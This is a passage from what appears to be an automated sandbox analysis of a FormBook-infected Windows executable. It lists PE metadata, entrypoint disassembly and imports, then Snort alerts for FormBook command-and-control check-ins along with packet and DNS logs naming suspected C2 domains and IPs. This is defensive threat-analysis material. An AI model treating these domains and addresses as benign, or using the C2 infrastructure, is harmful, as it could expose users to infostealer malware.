                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:4
                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:b1a57b635b23ffd553b3fd1e0960b2bd

                                                                                                Entrypoint Preview

                                                                                                Instruction
                                                                                                sub esp, 00000184h
                                                                                                push ebx
                                                                                                push ebp
                                                                                                push esi
                                                                                                push edi
                                                                                                xor ebx, ebx
                                                                                                push 00008001h
                                                                                                mov dword ptr [esp+20h], ebx
                                                                                                mov dword ptr [esp+14h], 00409130h
                                                                                                mov dword ptr [esp+1Ch], ebx
                                                                                                mov byte ptr [esp+18h], 00000020h
                                                                                                call dword ptr [004070B4h]
                                                                                                call dword ptr [004070B0h]
                                                                                                cmp ax, 00000006h
                                                                                                je 00007FA3A8D35D53h
                                                                                                push ebx
                                                                                                call 00007FA3A8D38B4Ch
                                                                                                cmp eax, ebx
                                                                                                je 00007FA3A8D35D49h
                                                                                                push 00000C00h
                                                                                                call eax
                                                                                                mov esi, 00407280h
                                                                                                push esi
                                                                                                call 00007FA3A8D38AC8h
                                                                                                push esi
                                                                                                call dword ptr [004070ACh]
                                                                                                lea esi, dword ptr [esi+eax+01h]
                                                                                                cmp byte ptr [esi], bl
                                                                                                jne 00007FA3A8D35D2Dh
                                                                                                push 0000000Dh
                                                                                                call 00007FA3A8D38B20h
                                                                                                push 0000000Bh
                                                                                                call 00007FA3A8D38B19h
                                                                                                mov dword ptr [007A27A4h], eax
                                                                                                call dword ptr [00407038h]
                                                                                                push ebx
                                                                                                call dword ptr [0040726Ch]
                                                                                                mov dword ptr [007A2858h], eax
                                                                                                push ebx
                                                                                                lea eax, dword ptr [esp+38h]
                                                                                                push 00000160h
                                                                                                push eax
                                                                                                push ebx
                                                                                                push 0079DD58h
                                                                                                call dword ptr [0040715Ch]
                                                                                                push 004091C0h
                                                                                                push 007A1FA0h
                                                                                                call 00007FA3A8D3874Ch
                                                                                                call dword ptr [00407108h]
                                                                                                mov ebp, 007A8000h
                                                                                                push eax
                                                                                                push ebp
                                                                                                call 00007FA3A8D3873Ah
                                                                                                push ebx
                                                                                                call dword ptr [00407144h]

                                                                                                Rich Headers

                                                                                                Programming Language:
                                                                                                • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                Data Directories

                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x74180xa0.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x3ab0000x967.rsrc
                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x70000x27c.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                Sections

                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                .text0x10000x5dbf0x5e00False0.682222406915data6.52625021941IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                .rdata0x70000x11960x1200False0.458767361111data5.20373620342IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .data0x90000x3998980x600unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                .ndata0x3a30000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .rsrc0x3ab0000x9670xa00False0.425390625data4.34609765996IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                Resources

                                                                                                NameRVASizeTypeLanguageCountry
                                                                                                RT_DIALOG0x3ab1780xb8dataEnglishUnited States
                                                                                                RT_DIALOG0x3ab2300x100dataEnglishUnited States
                                                                                                RT_DIALOG0x3ab3300x11cdataEnglishUnited States
                                                                                                RT_DIALOG0x3ab44c0x60dataEnglishUnited States
                                                                                                RT_VERSION0x3ab4ac0x108PDP-11 pure executable not strippedEnglishUnited States
                                                                                                RT_MANIFEST0x3ab5b40x3b3XML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                                Imports

                                                                                                DLLImport
                                                                                                KERNEL32.dllGetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, Sleep, lstrcmpiA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, GetCommandLineA, GetTempPathA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
                                                                                                USER32.dllSetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
                                                                                                GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
                                                                                                ADVAPI32.dllRegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                                COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                                                Version Infos

                                                                                                DescriptionData
                                                                                                ProductNamealbum
                                                                                                Translation0x0409 0x0000

                                                                                                Possible Origin

                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                EnglishUnited States

                                                                                                Network Behavior

                                                                                                Snort IDS Alerts

                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                03/22/21-08:56:02.968680TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972180192.168.2.5172.106.71.28
                                                                                                03/22/21-08:56:02.968680TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972180192.168.2.5172.106.71.28
                                                                                                03/22/21-08:56:02.968680TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972180192.168.2.5172.106.71.28
                                                                                                03/22/21-08:56:25.619002TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973080192.168.2.5103.48.133.159
                                                                                                03/22/21-08:56:25.619002TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973080192.168.2.5103.48.133.159
                                                                                                03/22/21-08:56:25.619002TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973080192.168.2.5103.48.133.159
                                                                                                03/22/21-08:56:42.087268TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973480192.168.2.5192.0.78.25
                                                                                                03/22/21-08:56:42.087268TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973480192.168.2.5192.0.78.25
                                                                                                03/22/21-08:56:42.087268TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973480192.168.2.5192.0.78.25

                                                                                                Network Port Distribution

                                                                                                TCP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Mar 22, 2021 08:55:46.500682116 CET4971780192.168.2.581.17.18.197
                                                                                                Mar 22, 2021 08:55:46.551697969 CET804971781.17.18.197192.168.2.5
                                                                                                Mar 22, 2021 08:55:46.551940918 CET4971780192.168.2.581.17.18.197
                                                                                                Mar 22, 2021 08:55:46.552105904 CET4971780192.168.2.581.17.18.197
                                                                                                Mar 22, 2021 08:55:46.600402117 CET804971781.17.18.197192.168.2.5
                                                                                                Mar 22, 2021 08:55:46.618179083 CET804971781.17.18.197192.168.2.5
                                                                                                Mar 22, 2021 08:55:46.618321896 CET804971781.17.18.197192.168.2.5
                                                                                                Mar 22, 2021 08:55:46.618552923 CET4971780192.168.2.581.17.18.197
                                                                                                Mar 22, 2021 08:55:46.618576050 CET4971780192.168.2.581.17.18.197
                                                                                                Mar 22, 2021 08:55:46.666888952 CET804971781.17.18.197192.168.2.5
                                                                                                Mar 22, 2021 08:55:56.943972111 CET4971880192.168.2.5108.167.156.70
                                                                                                Mar 22, 2021 08:55:57.100368023 CET8049718108.167.156.70192.168.2.5
                                                                                                Mar 22, 2021 08:55:57.100537062 CET4971880192.168.2.5108.167.156.70
                                                                                                Mar 22, 2021 08:55:57.100789070 CET4971880192.168.2.5108.167.156.70
                                                                                                Mar 22, 2021 08:55:57.257025957 CET8049718108.167.156.70192.168.2.5
                                                                                                Mar 22, 2021 08:55:57.607270002 CET4971880192.168.2.5108.167.156.70
                                                                                                Mar 22, 2021 08:55:57.804404020 CET8049718108.167.156.70192.168.2.5
                                                                                                Mar 22, 2021 08:55:58.222946882 CET8049718108.167.156.70192.168.2.5
                                                                                                Mar 22, 2021 08:55:58.222976923 CET8049718108.167.156.70192.168.2.5
                                                                                                Mar 22, 2021 08:55:58.223109007 CET4971880192.168.2.5108.167.156.70
                                                                                                Mar 22, 2021 08:55:58.223797083 CET4971880192.168.2.5108.167.156.70
                                                                                                Mar 22, 2021 08:56:02.811949015 CET4972180192.168.2.5172.106.71.28
                                                                                                Mar 22, 2021 08:56:02.966933012 CET8049721172.106.71.28192.168.2.5
                                                                                                Mar 22, 2021 08:56:02.968533993 CET4972180192.168.2.5172.106.71.28
                                                                                                Mar 22, 2021 08:56:02.968679905 CET4972180192.168.2.5172.106.71.28
                                                                                                Mar 22, 2021 08:56:03.123579979 CET8049721172.106.71.28192.168.2.5
                                                                                                Mar 22, 2021 08:56:03.212107897 CET8049721172.106.71.28192.168.2.5
                                                                                                Mar 22, 2021 08:56:03.212143898 CET8049721172.106.71.28192.168.2.5
                                                                                                Mar 22, 2021 08:56:03.212363958 CET4972180192.168.2.5172.106.71.28
                                                                                                Mar 22, 2021 08:56:03.212419033 CET4972180192.168.2.5172.106.71.28
                                                                                                Mar 22, 2021 08:56:03.367399931 CET8049721172.106.71.28192.168.2.5
                                                                                                Mar 22, 2021 08:56:08.773303032 CET4972280192.168.2.5172.67.161.235
                                                                                                Mar 22, 2021 08:56:08.818105936 CET8049722172.67.161.235192.168.2.5
                                                                                                Mar 22, 2021 08:56:08.818229914 CET4972280192.168.2.5172.67.161.235
                                                                                                Mar 22, 2021 08:56:08.818591118 CET4972280192.168.2.5172.67.161.235
                                                                                                Mar 22, 2021 08:56:08.863344908 CET8049722172.67.161.235192.168.2.5
                                                                                                Mar 22, 2021 08:56:09.084682941 CET8049722172.67.161.235192.168.2.5
                                                                                                Mar 22, 2021 08:56:09.084713936 CET8049722172.67.161.235192.168.2.5
                                                                                                Mar 22, 2021 08:56:09.084760904 CET8049722172.67.161.235192.168.2.5
                                                                                                Mar 22, 2021 08:56:09.084856033 CET4972280192.168.2.5172.67.161.235
                                                                                                Mar 22, 2021 08:56:09.084914923 CET4972280192.168.2.5172.67.161.235
                                                                                                Mar 22, 2021 08:56:14.190437078 CET4972880192.168.2.5185.18.52.85
                                                                                                Mar 22, 2021 08:56:14.239097118 CET8049728185.18.52.85192.168.2.5
                                                                                                Mar 22, 2021 08:56:14.239247084 CET4972880192.168.2.5185.18.52.85
                                                                                                Mar 22, 2021 08:56:14.239460945 CET4972880192.168.2.5185.18.52.85
                                                                                                Mar 22, 2021 08:56:14.288785934 CET8049728185.18.52.85192.168.2.5
                                                                                                Mar 22, 2021 08:56:14.289760113 CET8049728185.18.52.85192.168.2.5
                                                                                                Mar 22, 2021 08:56:14.289783001 CET8049728185.18.52.85192.168.2.5
                                                                                                Mar 22, 2021 08:56:14.289798975 CET8049728185.18.52.85192.168.2.5
                                                                                                Mar 22, 2021 08:56:14.289814949 CET8049728185.18.52.85192.168.2.5
                                                                                                Mar 22, 2021 08:56:14.289832115 CET8049728185.18.52.85192.168.2.5
                                                                                                Mar 22, 2021 08:56:14.289846897 CET8049728185.18.52.85192.168.2.5
                                                                                                Mar 22, 2021 08:56:14.289859056 CET8049728185.18.52.85192.168.2.5
                                                                                                Mar 22, 2021 08:56:14.290041924 CET4972880192.168.2.5185.18.52.85
                                                                                                Mar 22, 2021 08:56:14.290102959 CET4972880192.168.2.5185.18.52.85
                                                                                                Mar 22, 2021 08:56:14.337449074 CET8049728185.18.52.85192.168.2.5
                                                                                                Mar 22, 2021 08:56:19.366213083 CET4972980192.168.2.594.46.58.25
                                                                                                Mar 22, 2021 08:56:19.426253080 CET804972994.46.58.25192.168.2.5
                                                                                                Mar 22, 2021 08:56:19.426425934 CET4972980192.168.2.594.46.58.25
                                                                                                Mar 22, 2021 08:56:19.426618099 CET4972980192.168.2.594.46.58.25
                                                                                                Mar 22, 2021 08:56:19.534044981 CET804972994.46.58.25192.168.2.5
                                                                                                Mar 22, 2021 08:56:19.921107054 CET804972994.46.58.25192.168.2.5
                                                                                                Mar 22, 2021 08:56:19.921366930 CET4972980192.168.2.594.46.58.25
                                                                                                Mar 22, 2021 08:56:19.921416044 CET4972980192.168.2.594.46.58.25
                                                                                                Mar 22, 2021 08:56:19.981519938 CET804972994.46.58.25192.168.2.5
                                                                                                Mar 22, 2021 08:56:25.395694971 CET4973080192.168.2.5103.48.133.159
                                                                                                Mar 22, 2021 08:56:25.618662119 CET8049730103.48.133.159192.168.2.5
                                                                                                Mar 22, 2021 08:56:25.618849039 CET4973080192.168.2.5103.48.133.159
                                                                                                Mar 22, 2021 08:56:25.619002104 CET4973080192.168.2.5103.48.133.159
                                                                                                Mar 22, 2021 08:56:25.840115070 CET8049730103.48.133.159192.168.2.5
                                                                                                Mar 22, 2021 08:56:26.856615067 CET4973080192.168.2.5103.48.133.159
                                                                                                Mar 22, 2021 08:56:27.116609097 CET8049730103.48.133.159192.168.2.5
                                                                                                Mar 22, 2021 08:56:27.880943060 CET8049730103.48.133.159192.168.2.5
                                                                                                Mar 22, 2021 08:56:27.880964994 CET8049730103.48.133.159192.168.2.5
                                                                                                Mar 22, 2021 08:56:27.880980968 CET8049730103.48.133.159192.168.2.5
                                                                                                Mar 22, 2021 08:56:27.881000042 CET8049730103.48.133.159192.168.2.5
                                                                                                Mar 22, 2021 08:56:27.881017923 CET8049730103.48.133.159192.168.2.5
                                                                                                Mar 22, 2021 08:56:27.881082058 CET8049730103.48.133.159192.168.2.5
                                                                                                Mar 22, 2021 08:56:27.881136894 CET4973080192.168.2.5103.48.133.159
                                                                                                Mar 22, 2021 08:56:27.881190062 CET4973080192.168.2.5103.48.133.159
                                                                                                Mar 22, 2021 08:56:27.881242990 CET8049730103.48.133.159192.168.2.5
                                                                                                Mar 22, 2021 08:56:27.881259918 CET8049730103.48.133.159192.168.2.5
                                                                                                Mar 22, 2021 08:56:27.881278992 CET8049730103.48.133.159192.168.2.5
                                                                                                Mar 22, 2021 08:56:27.881298065 CET4973080192.168.2.5103.48.133.159
                                                                                                Mar 22, 2021 08:56:27.881316900 CET4973080192.168.2.5103.48.133.159
                                                                                                Mar 22, 2021 08:56:27.882625103 CET8049730103.48.133.159192.168.2.5
                                                                                                Mar 22, 2021 08:56:27.886982918 CET4973080192.168.2.5103.48.133.159
                                                                                                Mar 22, 2021 08:56:42.048660040 CET4973480192.168.2.5192.0.78.25
                                                                                                Mar 22, 2021 08:56:42.087002039 CET8049734192.0.78.25192.168.2.5
                                                                                                Mar 22, 2021 08:56:42.087121964 CET4973480192.168.2.5192.0.78.25
                                                                                                Mar 22, 2021 08:56:42.087268114 CET4973480192.168.2.5192.0.78.25
                                                                                                Mar 22, 2021 08:56:42.128098011 CET8049734192.0.78.25192.168.2.5
                                                                                                Mar 22, 2021 08:56:42.128125906 CET8049734192.0.78.25192.168.2.5
                                                                                                Mar 22, 2021 08:56:42.128140926 CET8049734192.0.78.25192.168.2.5
                                                                                                Mar 22, 2021 08:56:42.128264904 CET4973480192.168.2.5192.0.78.25
                                                                                                Mar 22, 2021 08:56:42.128357887 CET4973480192.168.2.5192.0.78.25
                                                                                                Mar 22, 2021 08:56:42.169112921 CET8049734192.0.78.25192.168.2.5
                                                                                                Mar 22, 2021 08:56:47.297122002 CET4973580192.168.2.5206.189.174.29
                                                                                                Mar 22, 2021 08:56:47.492913008 CET8049735206.189.174.29192.168.2.5
                                                                                                Mar 22, 2021 08:56:47.493120909 CET4973580192.168.2.5206.189.174.29
                                                                                                Mar 22, 2021 08:56:47.493304014 CET4973580192.168.2.5206.189.174.29
                                                                                                Mar 22, 2021 08:56:47.690190077 CET8049735206.189.174.29192.168.2.5
                                                                                                Mar 22, 2021 08:56:48.001975060 CET4973580192.168.2.5206.189.174.29
                                                                                                Mar 22, 2021 08:56:48.238059044 CET8049735206.189.174.29192.168.2.5
                                                                                                Mar 22, 2021 08:56:48.593951941 CET8049735206.189.174.29192.168.2.5
                                                                                                Mar 22, 2021 08:56:48.594044924 CET4973580192.168.2.5206.189.174.29
                                                                                                Mar 22, 2021 08:56:48.603634119 CET8049735206.189.174.29192.168.2.5
                                                                                                Mar 22, 2021 08:56:48.603652954 CET8049735206.189.174.29192.168.2.5
                                                                                                Mar 22, 2021 08:56:48.603776932 CET4973580192.168.2.5206.189.174.29
                                                                                                Mar 22, 2021 08:56:48.603812933 CET4973580192.168.2.5206.189.174.29

                                                                                                UDP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Mar 22, 2021 08:54:36.239388943 CET6206053192.168.2.58.8.8.8
                                                                                                Mar 22, 2021 08:54:36.293793917 CET53620608.8.8.8192.168.2.5
                                                                                                Mar 22, 2021 08:54:36.541697025 CET6180553192.168.2.58.8.8.8
                                                                                                Mar 22, 2021 08:54:36.588150978 CET53618058.8.8.8192.168.2.5
                                                                                                Mar 22, 2021 08:54:37.488244057 CET5479553192.168.2.58.8.8.8
                                                                                                Mar 22, 2021 08:54:37.555010080 CET53547958.8.8.8192.168.2.5
                                                                                                Mar 22, 2021 08:54:49.832566023 CET4955753192.168.2.58.8.8.8
                                                                                                Mar 22, 2021 08:54:49.882257938 CET53495578.8.8.8192.168.2.5
                                                                                                Mar 22, 2021 08:54:51.283489943 CET6173353192.168.2.58.8.8.8
                                                                                                Mar 22, 2021 08:54:51.330116987 CET53617338.8.8.8192.168.2.5
                                                                                                Mar 22, 2021 08:54:52.555161953 CET6544753192.168.2.58.8.8.8
                                                                                                Mar 22, 2021 08:54:52.602346897 CET53654478.8.8.8192.168.2.5
                                                                                                Mar 22, 2021 08:55:03.144059896 CET5244153192.168.2.58.8.8.8
                                                                                                Mar 22, 2021 08:55:03.201436043 CET53524418.8.8.8192.168.2.5
                                                                                                Mar 22, 2021 08:55:21.538986921 CET6217653192.168.2.58.8.8.8
                                                                                                Mar 22, 2021 08:55:21.586752892 CET53621768.8.8.8192.168.2.5
                                                                                                Mar 22, 2021 08:55:22.806471109 CET5959653192.168.2.58.8.8.8
                                                                                                Mar 22, 2021 08:55:22.855834961 CET53595968.8.8.8192.168.2.5
                                                                                                Mar 22, 2021 08:55:31.006511927 CET6529653192.168.2.58.8.8.8
                                                                                                Mar 22, 2021 08:55:31.057790041 CET53652968.8.8.8192.168.2.5
                                                                                                Mar 22, 2021 08:55:31.438847065 CET6318353192.168.2.58.8.8.8
                                                                                                Mar 22, 2021 08:55:31.496864080 CET53631838.8.8.8192.168.2.5
                                                                                                Mar 22, 2021 08:55:31.813611031 CET6015153192.168.2.58.8.8.8
                                                                                                Mar 22, 2021 08:55:31.860088110 CET53601518.8.8.8192.168.2.5
                                                                                                Mar 22, 2021 08:55:32.597048044 CET5696953192.168.2.58.8.8.8
                                                                                                Mar 22, 2021 08:55:32.645677090 CET53569698.8.8.8192.168.2.5
                                                                                                Mar 22, 2021 08:55:33.425743103 CET5516153192.168.2.58.8.8.8
                                                                                                Mar 22, 2021 08:55:33.475184917 CET53551618.8.8.8192.168.2.5
                                                                                                Mar 22, 2021 08:55:36.249867916 CET5475753192.168.2.58.8.8.8
                                                                                                Mar 22, 2021 08:55:36.322457075 CET53547578.8.8.8192.168.2.5
                                                                                                Mar 22, 2021 08:55:41.344412088 CET4999253192.168.2.58.8.8.8
                                                                                                Mar 22, 2021 08:55:41.422111034 CET53499928.8.8.8192.168.2.5
                                                                                                Mar 22, 2021 08:55:46.440406084 CET6007553192.168.2.58.8.8.8
                                                                                                Mar 22, 2021 08:55:46.495354891 CET53600758.8.8.8192.168.2.5
                                                                                                Mar 22, 2021 08:55:51.655822039 CET5501653192.168.2.58.8.8.8
                                                                                                Mar 22, 2021 08:55:51.736582994 CET53550168.8.8.8192.168.2.5
                                                                                                Mar 22, 2021 08:55:56.751733065 CET6434553192.168.2.58.8.8.8
                                                                                                Mar 22, 2021 08:55:56.942375898 CET53643458.8.8.8192.168.2.5
                                                                                                Mar 22, 2021 08:55:59.826670885 CET5712853192.168.2.58.8.8.8
                                                                                                Mar 22, 2021 08:55:59.898878098 CET53571288.8.8.8192.168.2.5
                                                                                                Mar 22, 2021 08:56:02.630248070 CET5479153192.168.2.58.8.8.8
                                                                                                Mar 22, 2021 08:56:02.810904026 CET53547918.8.8.8192.168.2.5
                                                                                                Mar 22, 2021 08:56:08.710719109 CET5046353192.168.2.58.8.8.8
                                                                                                Mar 22, 2021 08:56:08.771929026 CET53504638.8.8.8192.168.2.5
                                                                                                Mar 22, 2021 08:56:11.575575113 CET5039453192.168.2.58.8.8.8
                                                                                                Mar 22, 2021 08:56:11.635375977 CET53503948.8.8.8192.168.2.5
                                                                                                Mar 22, 2021 08:56:14.097253084 CET5853053192.168.2.58.8.8.8
                                                                                                Mar 22, 2021 08:56:14.188276052 CET53585308.8.8.8192.168.2.5
                                                                                                Mar 22, 2021 08:56:19.302058935 CET5381353192.168.2.58.8.8.8
                                                                                                Mar 22, 2021 08:56:19.364322901 CET53538138.8.8.8192.168.2.5
                                                                                                Mar 22, 2021 08:56:24.974946976 CET6373253192.168.2.58.8.8.8
                                                                                                Mar 22, 2021 08:56:25.192636967 CET53637328.8.8.8192.168.2.5
                                                                                                Mar 22, 2021 08:56:28.464200020 CET5734453192.168.2.58.8.8.8
                                                                                                Mar 22, 2021 08:56:28.540680885 CET53573448.8.8.8192.168.2.5
                                                                                                Mar 22, 2021 08:56:35.437037945 CET5445053192.168.2.58.8.8.8
                                                                                                Mar 22, 2021 08:56:35.484980106 CET53544508.8.8.8192.168.2.5
                                                                                                Mar 22, 2021 08:56:36.879928112 CET5926153192.168.2.58.8.8.8
                                                                                                Mar 22, 2021 08:56:36.942893028 CET53592618.8.8.8192.168.2.5
                                                                                                Mar 22, 2021 08:56:38.170471907 CET5715153192.168.2.58.8.8.8
                                                                                                Mar 22, 2021 08:56:38.236304998 CET53571518.8.8.8192.168.2.5
                                                                                                Mar 22, 2021 08:56:41.986288071 CET5941353192.168.2.58.8.8.8
                                                                                                Mar 22, 2021 08:56:42.046802998 CET53594138.8.8.8192.168.2.5
                                                                                                Mar 22, 2021 08:56:47.147586107 CET6051653192.168.2.58.8.8.8
                                                                                                Mar 22, 2021 08:56:47.287919998 CET53605168.8.8.8192.168.2.5
                                                                                                Mar 22, 2021 08:56:53.019181013 CET5164953192.168.2.58.8.8.8
                                                                                                Mar 22, 2021 08:56:53.075745106 CET53516498.8.8.8192.168.2.5
                                                                                                Mar 22, 2021 08:56:58.492563963 CET6508653192.168.2.58.8.8.8
                                                                                                Mar 22, 2021 08:56:58.557575941 CET53650868.8.8.8192.168.2.5

                                                                                                DNS Queries

                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                Mar 22, 2021 08:55:36.249867916 CET192.168.2.58.8.8.80x232Standard query (0)www.best10hostings.comA (IP address)IN (0x0001)
                                                                                                Mar 22, 2021 08:55:41.344412088 CET192.168.2.58.8.8.80xdb7fStandard query (0)www.verratjewelry.comA (IP address)IN (0x0001)
                                                                                                Mar 22, 2021 08:55:46.440406084 CET192.168.2.58.8.8.80x64bcStandard query (0)www.maggionaossurvey.comA (IP address)IN (0x0001)
                                                                                                Mar 22, 2021 08:55:51.655822039 CET192.168.2.58.8.8.80x83c2Standard query (0)www.fabulousfalafel.comA (IP address)IN (0x0001)
                                                                                                Mar 22, 2021 08:55:56.751733065 CET192.168.2.58.8.8.80x8c22Standard query (0)www.fenixforex.comA (IP address)IN (0x0001)
                                                                                                Mar 22, 2021 08:56:02.630248070 CET192.168.2.58.8.8.80xec5aStandard query (0)www.somht.comA (IP address)IN (0x0001)
                                                                                                Mar 22, 2021 08:56:08.710719109 CET192.168.2.58.8.8.80x878dStandard query (0)www.capacitaciondelfuturo.comA (IP address)IN (0x0001)
                                                                                                Mar 22, 2021 08:56:14.097253084 CET192.168.2.58.8.8.80x55c2Standard query (0)www.mantequillahub.proA (IP address)IN (0x0001)
                                                                                                Mar 22, 2021 08:56:19.302058935 CET192.168.2.58.8.8.80x2efdStandard query (0)www.casinoflames.comA (IP address)IN (0x0001)
                                                                                                Mar 22, 2021 08:56:24.974946976 CET192.168.2.58.8.8.80x9ad1Standard query (0)www.yyxingfa.comA (IP address)IN (0x0001)
                                                                                                Mar 22, 2021 08:56:36.879928112 CET192.168.2.58.8.8.80x89a1Standard query (0)www.xcash.fundA (IP address)IN (0x0001)
                                                                                                Mar 22, 2021 08:56:41.986288071 CET192.168.2.58.8.8.80xac8eStandard query (0)www.michaelroberts.galleryA (IP address)IN (0x0001)
                                                                                                Mar 22, 2021 08:56:47.147586107 CET192.168.2.58.8.8.80x94a4Standard query (0)www.antiracismbyu.comA (IP address)IN (0x0001)
                                                                                                Mar 22, 2021 08:56:53.019181013 CET192.168.2.58.8.8.80x40cdStandard query (0)www.rahasiasuksesbo.comA (IP address)IN (0x0001)
                                                                                                Mar 22, 2021 08:56:58.492563963 CET192.168.2.58.8.8.80x37e5Standard query (0)www.cvhrcm.comA (IP address)IN (0x0001)

                                                                                                DNS Answers

                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                Mar 22, 2021 08:55:36.322457075 CET8.8.8.8192.168.2.50x232Name error (3)www.best10hostings.comnonenoneA (IP address)IN (0x0001)
                                                                                                Mar 22, 2021 08:55:41.422111034 CET8.8.8.8192.168.2.50xdb7fName error (3)www.verratjewelry.comnonenoneA (IP address)IN (0x0001)
                                                                                                Mar 22, 2021 08:55:46.495354891 CET8.8.8.8192.168.2.50x64bcNo error (0)www.maggionaossurvey.com81.17.18.197A (IP address)IN (0x0001)
                                                                                                Mar 22, 2021 08:55:56.942375898 CET8.8.8.8192.168.2.50x8c22No error (0)www.fenixforex.comyjmanks.sitelockcdn.netCNAME (Canonical name)IN (0x0001)
                                                                                                Mar 22, 2021 08:55:56.942375898 CET8.8.8.8192.168.2.50x8c22No error (0)yjmanks.sitelockcdn.net108.167.156.70A (IP address)IN (0x0001)
                                                                                                Mar 22, 2021 08:56:02.810904026 CET8.8.8.8192.168.2.50xec5aNo error (0)www.somht.com172.106.71.28A (IP address)IN (0x0001)
                                                                                                Mar 22, 2021 08:56:08.771929026 CET8.8.8.8192.168.2.50x878dNo error (0)www.capacitaciondelfuturo.com172.67.161.235A (IP address)IN (0x0001)
                                                                                                Mar 22, 2021 08:56:08.771929026 CET8.8.8.8192.168.2.50x878dNo error (0)www.capacitaciondelfuturo.com104.21.15.71A (IP address)IN (0x0001)
